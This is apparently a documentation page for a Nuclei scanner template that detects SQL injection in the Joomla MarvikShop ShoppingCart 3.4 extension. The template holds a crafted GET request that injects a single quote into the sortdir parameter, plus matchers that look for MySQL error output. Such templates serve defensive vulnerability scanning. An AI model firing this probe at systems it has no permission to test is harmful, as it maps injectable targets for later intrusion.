Skip to content

Joomla MarvikShop ShoppingCart 3.4 - Sql Injection

ID: joomla-marvikshop-sqli

Severity: high

Author: r3Y3r53

Tags: joomla,marvikshop,sqli,unauth

Joomla MarvikShop ShoppingCart 3.4 is vulnerable to SQL injection which is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.

id: joomla-marvikshop-sqli
info:
name: Joomla MarvikShop ShoppingCart 3.4 - Sql Injection
author: r3Y3r53
severity: high
description: |
Joomla MarvikShop ShoppingCart 3.4 is vulnerable to SQL injection which is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.
reference:
- https://vulners.com/zdt/1337DAY-ID-38020
- https://cxsecurity.com/issue/WLB-2022100015
- https://extensions.joomla.org/
metadata:
verified: true
max-request: 1
tags: joomla,marvikshop,sqli,unauth
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27"
matchers:
- type: dsl
dsl:
- 'contains(body, "You have an error in your SQL syntax") && contains(body, "manufacturers_id") && contains(body, "products_price")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 490a00463044022025808488572b7bbd1cbc9a8c72b7a5a26e193050d75e88597f62d4d7ad62073a02205fd6514378e758a4818d60ad3a3091784a8570648b8a84fb006a9dabf856573f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/joomla/joomla-marvikshop-sqli.yaml"

View on Github